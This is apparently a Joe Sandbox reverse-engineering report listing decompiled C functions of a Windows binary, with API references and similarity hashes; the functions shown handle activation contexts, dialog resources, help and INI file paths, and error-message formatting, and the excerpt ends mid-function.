                  Function 0041FEE8, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041FEE8() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t6;
				void* _t7;

				if( *0x44fa08 == 0) {
					_t2 = GetModuleHandleW(L"KERNEL32");
					 *0x44fa08 = _t2;
					if(_t2 == 0) {
						_t2 = E00413DD0(_t7);
					}
					 *0x44f9f4 = GetProcAddress(_t2, "CreateActCtxW");
					 *0x44f9f8 = GetProcAddress( *0x44fa08, "ReleaseActCtx");
					 *0x44f9fc = GetProcAddress( *0x44fa08, "ActivateActCtx");
					_t6 = GetProcAddress( *0x44fa08, "DeactivateActCtx");
					 *0x44fa00 = _t6;
					return _t6;
				}
				return _t1;
			}







                  0x0041feef
                  0x0041fef6
                  0x0041fefc
                  0x0041ff03
                  0x0041ff05
                  0x0041ff05
                  0x0041ff24
                  0x0041ff36
                  0x0041ff48
                  0x0041ff4d
                  0x0041ff4f
                  0x00000000
                  0x0041ff54
                  0x0041ff55

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32,00420002), ref: 0041FEF6
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041FF17
                  • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041FF29
                  • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041FF3B
                  • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041FF4D
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$Exception@8HandleModuleThrow
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 2144170044-2424895508
                  • Opcode ID: 26caa32cc911c5a1d17336da9f3835d6e3b2b7817387ef73e5d7cc0fb7c4947b
                  • Instruction ID: 24ab1d7278d060f86f713ef97fe5e098ed9ac87127f2faf2f53f4ce9b08e43f6
                  • Opcode Fuzzy Hash: 26caa32cc911c5a1d17336da9f3835d6e3b2b7817387ef73e5d7cc0fb7c4947b
                  • Instruction Fuzzy Hash: ADF01CB8D45366AEDB006F79BC0AB473FA4A70A720B205137E858E2671D7B8508CCF5D
                  Uniqueness

                  Uniqueness Score: 0.28%

                  Function 0041EC43, Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041EC43(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed int _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E0042925E(E00439388, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E0042083D(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E0042083D(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceW(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E0041E7B8(_t84, _t100, __eflags);
					E0040E2C7(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E0040CC4F();
								 *(_t101 - 0x24) = _t84;
								__eflags = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x128))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E00411E53(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E00411E6E(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E00410178(_t84, __eflags, _t100);
					_t58 = E0040E20E(_t84, _t86,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E0041EA88(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E00411D59(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E0040DC98(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E00411EB6(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E00411E6E(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E0041E7F4(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E00429303(_t63);
				}
			}
















                  0x0041ec43
                  0x0041ec43
                  0x0041ec43
                  0x0041ec4a
                  0x0041ec4f
                  0x0041ec51
                  0x0041ec57
                  0x0041ec5d
                  0x0041ec60
                  0x0041ec65
                  0x0041ec68
                  0x0041ec6a
                  0x0041ec6d
                  0x0041ec74
                  0x0041ec85
                  0x0041ec8b
                  0x0041ec8b
                  0x0041ec91
                  0x0041ec96
                  0x0041ec9c
                  0x0041ec9c
                  0x0041eca2
                  0x0041ecac
                  0x0041ecb3
                  0x0041ecb6
                  0x0041ecbb
                  0x0041ecbe
                  0x0041ecc1
                  0x0041ecc4
                  0x0041ecc7
                  0x0041eccf
                  0x0041ecd2
                  0x0041ecdd
                  0x0041ecdf
                  0x0041ece6
                  0x0041ecec
                  0x0041ecf8
                  0x0041ecfa
                  0x0041ecfd
                  0x0041ecff
                  0x0041ed03
                  0x0041ed0b
                  0x0041ed0d
                  0x0041ed0f
                  0x0041ed16
                  0x0041ed18
                  0x0041ed1c
                  0x0041ed1e
                  0x0041ed23
                  0x0041ed23
                  0x0041ed18
                  0x0041ed0d
                  0x0041ecff
                  0x0041ecdf
                  0x0041ecd2
                  0x0041ed2a
                  0x0041ed2f
                  0x0041ed37
                  0x0041ed3c
                  0x0041ed3d
                  0x0041ed3e
                  0x0041ed43
                  0x0041ed48
                  0x0041ed4a
                  0x0041ed4c
                  0x0041ed4e
                  0x0041ed52
                  0x0041ed56
                  0x0041ed59
                  0x0041ed5e
                  0x0041ed63
                  0x0041ed67
                  0x0041ed67
                  0x0041ed6b
                  0x0041ed70
                  0x0041ed70
                  0x0041ed70
                  0x0041ed72
                  0x0041ed75
                  0x0041ed83
                  0x0041ed83
                  0x0041ed75
                  0x0041ed88
                  0x0041edb3
                  0x0041edb6
                  0x0041edbc
                  0x0041edbc
                  0x0041edc1
                  0x0041edc4
                  0x0041edcb
                  0x0041edcb
                  0x0041edd1
                  0x0041edd4
                  0x0041eddc
                  0x0041eddf
                  0x0041ede4
                  0x0041ede4
                  0x0041eddf
                  0x0041edee
                  0x0041edf3
                  0x0041edf8
                  0x0041edfb
                  0x0041ee00
                  0x0041ee00
                  0x0041ee06
                  0x00000000
                  0x0041eca4
                  0x0041eca4
                  0x0041ee09
                  0x0041ee0e
                  0x0041ee0e

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041EC4A
                  • FindResourceW.KERNEL32(?,?,00000005), ref: 0041EC7D
                  • LoadResource.KERNEL32(?,00000000), ref: 0041EC85
                    • Part of subcall function 0040E2C7: UnhookWindowsHookEx.USER32(?), ref: 0040E2F7
                  • LockResource.KERNEL32(?,00000024,004089A8,A6E2BCA1), ref: 0041EC96
                  • GetDesktopWindow.USER32 ref: 0041ECC9
                  • IsWindowEnabled.USER32(?), ref: 0041ECD7
                  • EnableWindow.USER32(?,00000000), ref: 0041ECE6
                    • Part of subcall function 00411E53: IsWindowEnabled.USER32(?), ref: 00411E5C
                    • Part of subcall function 00411E6E: EnableWindow.USER32(?,004089A8), ref: 00411E7F
                  • EnableWindow.USER32(?,00000001), ref: 0041EDCB
                  • GetActiveWindow.USER32 ref: 0041EDD6
                  • SetActiveWindow.USER32(?), ref: 0041EDE4
                  • FreeResource.KERNEL32(?,?,00000024,004089A8,A6E2BCA1), ref: 0041EE00
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                  • String ID:
                  • API String ID: 964565984-0
                  • Opcode ID: fe0207d4ecd80c08f45642bcb39e6459c124003afb4992ac405e18d192ee7def
                  • Instruction ID: fde7dbc461ea99a3f7dbf453eac50beea4943e19dc7ae5404a43dc21f7068163
                  • Opcode Fuzzy Hash: fe0207d4ecd80c08f45642bcb39e6459c124003afb4992ac405e18d192ee7def
                  • Instruction Fuzzy Hash: 97518234A00706DBDB21AFA6D849AEEB7B1FF44705F14002FF942622E1DB795981CB5E
                  Uniqueness

                  Uniqueness Score: 0.32%

                  Function 00403330, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 286UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00403330(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char _v864;
				char _v868;
				signed int _v872;
				char _v876;
				char _v892;
				signed int _v893;
				char _v900;
				char _v904;
				char _v908;
				char _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				signed int _v944;
				signed int _v948;
				char _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				void* __ebp;
				signed int _t143;
				signed int _t144;
				void* _t154;
				void* _t166;
				signed short _t177;
				signed short _t193;
				signed int _t195;
				intOrPtr _t226;
				intOrPtr _t252;
				signed int _t293;

				_t292 = __esi;
				_t291 = __edi;
				_t216 = __ebx;
				_push(0xffffffff);
				_push(E004384DB);
				_push( *[fs:0x0]);
				_t143 =  *0x44c364; // 0xa6e2bca1
				_t144 = _t143 ^ _t293;
				_v32 = _t144;
				_push(_t144);
				 *[fs:0x0] =  &_v16;
				_v928 = __ecx;
				E00404820( &_v20);
				_v8 = 0;
				E00404E80( &_v864);
				_v8 = 1;
				E00404820( &_v844);
				_v8 = 2;
				_v28 = E00403810( *((intOrPtr*)(_v928 + 0x58)));
				_v24 = E00401B20(__ebx,  &_v864,  &_v20, __edi, __esi,  &_v20,  &_v864, 0, 0x8c, 0x7c);
				_t300 = _v24;
				if(_v24 >= 0) {
					E0041286F(__ebx,  &_v840, __edi, __esi, __eflags, 0, 0, 0, 6, E0040A540( &_v20), 0, 0, 1);
					_v8 = 4;
					_t154 = E00411FAB( &_v840);
					_t226 = _v928;
					_t285 =  *(_t226 + 0x98);
					 *(_t154 + 0x18) =  *(_t226 + 0x98);
					_v848 = E004130CD( &_v840, __eflags);
					__eflags = _v848 - 1;
					if(__eflags == 0) {
						 *((intOrPtr*)(_v928 + 0x98)) =  *((intOrPtr*)(E00411FAB( &_v840) + 0x18));
						_push( &_v852);
						E004131FC(__ebx,  &_v840, __edi, __esi, __eflags);
						_v8 = 5;
						_push( &_v900);
						_v940 = E004134AC(__ebx,  &_v840, __edi, __esi, __eflags);
						_v893 = E00404E60(_v940);
						E00404840( &_v900);
						_t285 = _v893 & 0x000000ff;
						__eflags = _v893 & 0x000000ff;
						if((_v893 & 0x000000ff) != 0) {
							_t177 = E00404DE0(_t216,  &_v852, _t291, _t292, E00404E40( &_v852) - 1);
							__eflags = (_t177 & 0x0000ffff) - 0x2e;
							if((_t177 & 0x0000ffff) == 0x2e) {
								__eflags = E00404E40( &_v852) - 1;
								_v944 = E00404CA0( &_v852,  &_v904, E00404E40( &_v852) - 1);
								_t285 = _v944;
								_v948 = _v944;
								_v8 = 6;
								E00404860( &_v852, _v948);
								_v8 = 5;
								E00404840( &_v904);
							}
							E00404820( &_v868);
							_v8 = 7;
							_t252 = _v928;
							__eflags =  *(_t252 + 0x98);
							if( *(_t252 + 0x98) != 0) {
								_t88 =  *((intOrPtr*)(_v928 + 0x98)) - 1; // -1
								_v872 =  *((intOrPtr*)(_v928 + 0x98)) + _t88;
								_v876 = 0;
								while(1) {
									__eflags = _v872;
									if(_v872 == 0) {
										break;
									}
									_v952 = _v876;
									_v876 = _v876 + 1;
									_t193 = E00404DE0(_t216,  &_v20, _t291, _t292, _v952);
									__eflags = (_t193 & 0x0000ffff) - 0x7c;
									if((_t193 & 0x0000ffff) == 0x7c) {
										_t195 = _v872 - 1;
										__eflags = _t195;
										_v872 = _t195;
									}
								}
								_t285 =  &_v908;
								_v956 = E00404A60( &_v20,  &_v908, 0x43a7d8,  &_v876);
								_v960 = _v956;
								_v8 = 8;
								E00404860( &_v868, E00404C20(_v960));
								_v8 = 7;
								E00404840( &_v908);
								E00404880( &_v868, PathFindExtensionW(E0040A540( &_v868)));
							} else {
								E004048A0( &_v868, ".jpg");
							}
							E00404980( &_v852,  &_v868);
							_v8 = 5;
							E00404840( &_v868);
						}
						__eflags = _v24;
						if(__eflags < 0) {
							_v964 = E00401610( &_v924, _v24, 0, 0);
							_v968 = _v964;
							_v8 = 9;
							_push(E00401700(_v968));
							_t285 =  &_v844;
							E00406170( &_v844, 0xaf, _v24);
							_v8 = 5;
							E004016A0( &_v924);
							E00413C2B(_t216, _t291, _t292, __eflags, E0040A540( &_v844), 0, 0);
						}
						_v8 = 4;
						E00404840( &_v852);
						_v8 = 2;
						E00412711(_t216,  &_v840, _t291, _t292, __eflags);
						_v8 = 1;
						E00404840( &_v844);
						_v8 = 0;
						E00406230( &_v864);
						_v8 = 0xffffffff;
						_t166 = E00404840( &_v20);
					} else {
						_v8 = 2;
						E00412711(__ebx,  &_v840, __edi, __esi, __eflags);
						_v8 = 1;
						E00404840( &_v844);
						_v8 = 0;
						E00406230( &_v864);
						_v8 = 0xffffffff;
						_t166 = E00404840( &_v20);
					}
				} else {
					_v932 = E00401610( &_v892, _v24, 0, 0);
					_v936 = _v932;
					_v8 = 3;
					_push(E00401700(_v936));
					_t285 = _v24;
					E00406170( &_v844, 0xaa, _v24);
					_v8 = 2;
					E004016A0( &_v892);
					E00413C2B(__ebx, __edi, __esi, _t300, E0040A540( &_v844), 0, 0);
					_v8 = 1;
					E00404840( &_v844);
					_v8 = 0;
					E00406230( &_v864);
					_v8 = 0xffffffff;
					_t166 = E00404840( &_v20);
				}
				 *[fs:0x0] = _v16;
				return E00427DFF(_t166, _t216, _v32 ^ _t293, _t285, _t291, _t292);
			}













































                  0x00403330
                  0x00403330
                  0x00403330
                  0x00403333
                  0x00403335
                  0x00403340
                  0x00403347
                  0x0040334c
                  0x0040334e
                  0x00403351
                  0x00403355
                  0x0040335b
                  0x00403364
                  0x00403369
                  0x00403376
                  0x0040337b
                  0x00403385
                  0x0040338a
                  0x0040339c
                  0x004033bb
                  0x004033be
                  0x004033c2
                  0x00403488
                  0x0040348d
                  0x00403497
                  0x0040349c
                  0x004034a2
                  0x004034a8
                  0x004034b6
                  0x004034bc
                  0x004034c3
                  0x0040351a
                  0x00403526
                  0x0040352d
                  0x00403532
                  0x0040353c
                  0x00403548
                  0x00403559
                  0x00403565
                  0x0040356a
                  0x00403571
                  0x00403573
                  0x0040358e
                  0x00403596
                  0x00403599
                  0x004035a6
                  0x004035bc
                  0x004035c2
                  0x004035c8
                  0x004035ce
                  0x004035df
                  0x004035e4
                  0x004035ee
                  0x004035ee
                  0x004035f9
                  0x004035fe
                  0x00403602
                  0x00403608
                  0x0040360f
                  0x00403632
                  0x00403636
                  0x0040363c
                  0x00403646
                  0x00403646
                  0x0040364d
                  0x00000000
                  0x00000000
                  0x00403655
                  0x00403664
                  0x00403674
                  0x0040367c
                  0x0040367f
                  0x00403687
                  0x00403687
                  0x0040368a
                  0x0040368a
                  0x00403690
                  0x0040369e
                  0x004036ad
                  0x004036b9
                  0x004036bf
                  0x004036d5
                  0x004036da
                  0x004036e4
                  0x00403702
                  0x00403611
                  0x0040361c
                  0x0040361c
                  0x00403714
                  0x00403719
                  0x00403723
                  0x00403723
                  0x00403728
                  0x0040372c
                  0x00403741
                  0x0040374d
                  0x00403753
                  0x00403762
                  0x0040376c
                  0x00403773
                  0x0040377b
                  0x00403785
                  0x0040379a
                  0x0040379a
                  0x0040379f
                  0x004037a9
                  0x004037ae
                  0x004037b8
                  0x004037bd
                  0x004037c7
                  0x004037cc
                  0x004037d6
                  0x004037db
                  0x004037e5
                  0x004034c5
                  0x004034c5
                  0x004034cf
                  0x004034d4
                  0x004034de
                  0x004034e3
                  0x004034ed
                  0x004034f2
                  0x004034fc
                  0x004034fc
                  0x004033c8
                  0x004033db
                  0x004033e7
                  0x004033ed
                  0x004033fc
                  0x004033fd
                  0x0040340d
                  0x00403415
                  0x0040341f
                  0x00403434
                  0x00403439
                  0x00403443
                  0x00403448
                  0x00403452
                  0x00403457
                  0x00403461
                  0x00403461
                  0x004037ed
                  0x00403802

                  APIs
                  • std::exception::exception.LIBCMTD ref: 00403376
                  • _com_error::_com_error.COMSUPPD ref: 004033D6
                    • Part of subcall function 00401700: FormatMessageW.KERNEL32(00001300,00000000,00AA6852,00000400,004013D1,00000000,00000000,004013DD,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 00401734
                    • Part of subcall function 00401700: lstrlenW.KERNEL32(00000000,?,?,?,000000B0,A6E2BCA1), ref: 0040174A
                    • Part of subcall function 00406170: _DebugHeapAllocator.LIBCPMTD ref: 004061A1
                    • Part of subcall function 004016A0: GetProcessHeap.KERNEL32(?,00401405,?,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 004016D8
                    • Part of subcall function 004016A0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004016F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Heap$AllocatorDebugFormatFreeMessageProcess_com_error::_com_errorlstrlenstd::exception::exception
                  • String ID: .jpg
                  • API String ID: 3950668111-3623929066
                  • Opcode ID: fa0901f801f913cea652976c4d360c2984ee6285b6a79ab8e56e3ed2da686b09
                  • Instruction ID: 5cd3b7c294478c2aa95b472f2e812587f88935d83f9b8159460fa1860baa5cdb
                  • Opcode Fuzzy Hash: fa0901f801f913cea652976c4d360c2984ee6285b6a79ab8e56e3ed2da686b09
                  • Instruction Fuzzy Hash: 20D14A708102589BDB26EB65CC51BEEB778AF55308F1084EEA10A772D1DB782F84CF59
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0042764D, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128COMMON
                  Download Yara Rule
                  C-Code - Quality: 61%
                  			E0042764D(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				short _v528;
				char _v1048;
				char _v1560;
				WCHAR* _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				long _t41;
				WCHAR* _t44;
				intOrPtr _t61;
				intOrPtr _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				signed int _t89;
				void* _t90;

				_t79 = __edx;
				_t72 = __ecx;
				_t87 = _t89;
				_t90 = _t89 - 0x618;
				_t35 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t35 ^ _t89;
				_push(_t69);
				_push(_t80);
				_t84 = __ecx;
				_t70 = E0042083D(_t69, _t80, __ecx, __eflags);
				 *(_t70 + 8) =  *(_t84 + 0x44);
				 *(_t70 + 0xc) =  *(_t84 + 0x44);
				_t41 = GetModuleFileNameW( *(_t84 + 0x44),  &_v528, 0x104);
				if(_t41 == 0 || _t41 == 0x104) {
					E0041416A(_t72);
				}
				_t44 = PathFindExtensionW( &_v528);
				_v1564 = _t44;
				if(_t44 == 0) {
					E0041416A(_t72);
				}
				_t73 = _v1564;
				 *_v1564 = 0;
				if(E0042760D(_v1564,  &_v528,  &_v1048, 0x104) != 0) {
					E0041416A(_t73);
				}
				if( *((intOrPtr*)(_t84 + 0x60)) == 0) {
					_t66 = E0042B22A(_t79,  &_v1048);
					_pop(_t73);
					 *((intOrPtr*)(_t84 + 0x60)) = _t66;
					if(_t66 == 0) {
						L10:
						E00413D98(_t73);
					}
				}
				_t49 =  *((intOrPtr*)(_t84 + 0x50));
				if(_t49 == 0) {
					if(E004152FF(_t70, _t73, 0x104, _t84, 0xe000,  &_v1560, 0x100) == 0) {
						_push( *((intOrPtr*)(_t84 + 0x60)));
					} else {
						_push( &_v1560);
					}
					_t49 = E0042B22A(_t79);
					 *((intOrPtr*)(_t84 + 0x50)) = _t49;
					_pop(_t73);
					if(_t49 == 0) {
						goto L10;
					}
				}
				 *((intOrPtr*)(_t70 + 0x10)) = _t49;
				if( *((intOrPtr*)(_t84 + 0x64)) == 0) {
					_t78 = 0x104 - (_v1564 -  &_v528 >> 1);
					if( *((intOrPtr*)(_t84 + 0x6c)) != 1) {
						_push(L".HLP");
					} else {
						_push(L".CHM");
					}
					_push(_t78);
					_push(_v1564);
					E00411FBE();
					_t90 = _t90 + 0xc;
					_t61 = E0042B22A(_t79,  &_v528);
					_pop(_t73);
					 *((intOrPtr*)(_t84 + 0x64)) = _t61;
					if(_t61 == 0) {
						goto L10;
					} else {
						_t73 = _v1564;
						_t49 = 0;
						 *_v1564 = 0;
					}
				}
				if( *((intOrPtr*)(_t84 + 0x68)) == 0) {
					E00402880(_t73, E0042B1AD( &_v1048, 0x104, L".INI"));
					_t49 = E0042B22A(_t79,  &_v1048);
					_t90 = _t90 + 0x14;
					 *((intOrPtr*)(_t84 + 0x68)) = _t49;
					if(_t49 == 0) {
						goto L10;
					}
				}
				_pop(_t82);
				_pop(_t85);
				_pop(_t71);
				return E00427DFF(_t49, _t71, _v8 ^ _t87, _t79, _t82, _t85);
			}




























                  0x0042764d
                  0x0042764d
                  0x00427650
                  0x00427652
                  0x00427658
                  0x0042765f
                  0x00427662
                  0x00427664
                  0x00427665
                  0x0042766c
                  0x00427671
                  0x00427677
                  0x0042768a
                  0x00427692
                  0x00427698
                  0x00427698
                  0x004276a4
                  0x004276aa
                  0x004276b2
                  0x004276b4
                  0x004276b4
                  0x004276b9
                  0x004276c1
                  0x004276da
                  0x004276dc
                  0x004276dc
                  0x004276e5
                  0x004276ee
                  0x004276f3
                  0x004276f4
                  0x004276f9
                  0x004276fb
                  0x004276fb
                  0x004276fb
                  0x004276f9
                  0x00427700
                  0x00427705
                  0x0042771f
                  0x0042772a
                  0x00427721
                  0x00427727
                  0x00427727
                  0x0042772d
                  0x00427732
                  0x00427735
                  0x00427738
                  0x00000000
                  0x00000000
                  0x00427738
                  0x0042773a
                  0x00427741
                  0x00427755
                  0x0042775b
                  0x00427764
                  0x0042775d
                  0x0042775d
                  0x0042775d
                  0x00427769
                  0x0042776a
                  0x00427770
                  0x0042777b
                  0x0042777f
                  0x00427784
                  0x00427785
                  0x0042778a
                  0x00000000
                  0x00427790
                  0x00427790
                  0x00427796
                  0x00427798
                  0x00427798
                  0x0042778a
                  0x0042779f
                  0x004277b4
                  0x004277c0
                  0x004277c5
                  0x004277c8
                  0x004277cd
                  0x00000000
                  0x00000000
                  0x004277cd
                  0x004277d6
                  0x004277d7
                  0x004277da
                  0x004277e1

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __wcsdup$ExtensionFileFindModuleNamePath
                  • String ID: .CHM$.HLP$.INI
                  • API String ID: 2477486372-4017452060
                  • Opcode ID: a6e8f7418ca4730a1224ee4ad42bbeeed1c4b5aec68547b78c653d68e54b399f
                  • Instruction ID: 0061e79066eda8a606490fc8e7f00c3e72cb7088ad3a17422050bb6e6b6c3ff4
                  • Opcode Fuzzy Hash: a6e8f7418ca4730a1224ee4ad42bbeeed1c4b5aec68547b78c653d68e54b399f
                  • Instruction Fuzzy Hash: 8941A5716007299BDB20EF75EC45A9B73F8AF84314F4008AFE446D3241EB78E980CB69
                  Uniqueness

                  Uniqueness Score: 7.75%

                  Function 00401700, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97memorystringwindowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401700(intOrPtr __ecx) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				if( *(_v20 + 0xc) != 0) {
					L12:
					_t55 = _v20 + 0xc; // 0xfffffc74
					return  *_t55;
				}
				_t6 = _v20 + 4; // 0xaa6852
				FormatMessageW(0x1300, 0,  *_t6, 0x400, _v20 + 0xc, 0, 0);
				if( *(_v20 + 0xc) == 0) {
					_v12 = GetProcessHeap();
					if(_v12 != 0) {
						 *(_v20 + 0xc) = HeapAlloc(_v12, 0, 0x40);
						if( *(_v20 + 0xc) != 0) {
							_v16 = E00401830(_v20);
							if((_v16 & 0x0000ffff) == 0) {
								swprintf( *(_v20 + 0xc), 0x20, L"Unknown error 0x%0lX",  *(_v20 + 4));
							} else {
								swprintf( *(_v20 + 0xc), 0x20, L"IDispatch error #%d", _v16 & 0x0000ffff);
							}
						}
					}
					goto L12;
				}
				_v8 = lstrlenW( *(_v20 + 0xc));
				if(_v8 > 1 && ( *( *(_v20 + 0xc) + _v8 * 2 - 2) & 0x0000ffff) == 0xa) {
					 *( *(_v20 + 0xc) + _v8 * 2 - 2) = 0;
